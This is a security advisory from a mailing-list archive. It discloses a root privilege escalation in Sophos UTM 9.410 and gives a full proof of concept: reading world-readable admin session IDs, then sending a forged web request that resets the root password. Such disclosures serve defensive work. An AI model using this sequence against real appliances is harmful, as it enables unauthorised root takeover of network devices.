KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions

[KoreLogic Disclosures <disclosures () korelogic com>]

KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions

Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions
Advisory ID: KL-001-2017-020
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt


1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: UTM 9
     Affected Version: 9.410
     Platform: Embedded Linux
     CWE Classification: CWE-280: Improper Handling of Insufficient
                         Permissions or Privileges
     Impact: Root Access
     Attack vector: SSH

2. Vulnerability Description

     The attacker must know the password for the loginuser
     account. The confd client is not available to the loginuser
     account. However, it is possible to list a directory containing
     a sub-directories whose names are valid session identifiers
     (SID) and can be used to make requests on behalf of other
     accounts, such as admin. This allows for escalation to root
     privilege.

3. Technical Description

     1. Obtain the a privileged session token

        $ ssh loginuser@1.3.3.7
        loginuser@1.3.3.7's password:

        Sophos UTM
        (C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.
        Sophos is a registered trademark of Sophos Limited and Sophos Group.
        All other product and company names mentioned are trademarks or registered
        trademarks of their respective owners.

        For more copyright information look at /doc/astaro-license.txt
        or http://www.astaro.com/doc/astaro-license.txt

        NOTE: If not explicitly approved by Sophos support, any modifications
              done by root will void your support.

        loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/
        loginuser@[redacted]:/var/confd/var/sessions > ls -la
        total 40
        drwxr-xr-x 2 root root 4096 Mar 23 14:53 .
        drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..
        -rw-r--r-- 1 root root  359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC
        -rw-r--r-- 1 root root    5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock
        -rw-r--r-- 1 root root  369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk
        -rw-r--r-- 1 root root   35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock
        -rw-r--r-- 1 root root  367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP
        -rw-r--r-- 1 root root   10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock
        -rw-r--r-- 1 root root  370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN
        -rw-r--r-- 1 root root    5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock

     2. Set the root password

        POST /webadmin.plx HTTP/1.1
        Host: 1.3.3.7:4444
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
        Accept: text/javascript, text/html, application/xml, text/xml, */*
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        X-Prototype-Version: 1.5.1.1
        Content-Type: application/json; charset=UTF-8
        Referer: https://1.3.3.7:4444/
        Content-Length: 418
        Cookie: SID=xZzeOIhVClqKYsmCKHrN
        DNT: 1
        Connection: close

        {"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": 
"loginuser",
"loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko",
"backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881",
"current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

        HTTP/1.1 200 OK
        Date: Thu, 23 Mar 2017 14:57:19 GMT
        Server: Apache
        Expires: Thursday, 01-Jan-1970 00:00:01 GMT
        Pragma: no-cache
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Option: nosniff
        X-XSS-Protection: 1; mode=block
        Vary: Accept-Encoding
        Connection: close
        Content-Type: application/json; charset=utf-8
        Content-Length: 24690

        
{"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell
 user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",
        [snip]
        "_cookie":null,"wdebug":0}

     3. Look for success message.

        "objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

     4. Profit.

        loginuser@[redacted]:/home/login > su
        Password:
        [redacted]:/home/login # id
        uid=0(root) gid=0(root) groups=0(root),890(xorp)

4. Mitigation and Remediation Recommendation

     The vendor has addressed this vulnerability in version
     9.503. Release notes and download instructions can be found at:
     https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2017.07.21 - KoreLogic submits vulnerability details to Sophos.
     2017.07.21 - Sophos acknowledges receipt.
     2017.09.01 - 30 business days have elapsed since the vulnerability
                  was reported to Sophos.
     2017.09.15 - KoreLogic requests an update on the status of this and
                  other vulnerabilities reported to Sophos.
     2017.09.18 - Sophos informs KoreLogic that this issue has been
                  remediated in release 9.503 for UTM.
     2017.10.24 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/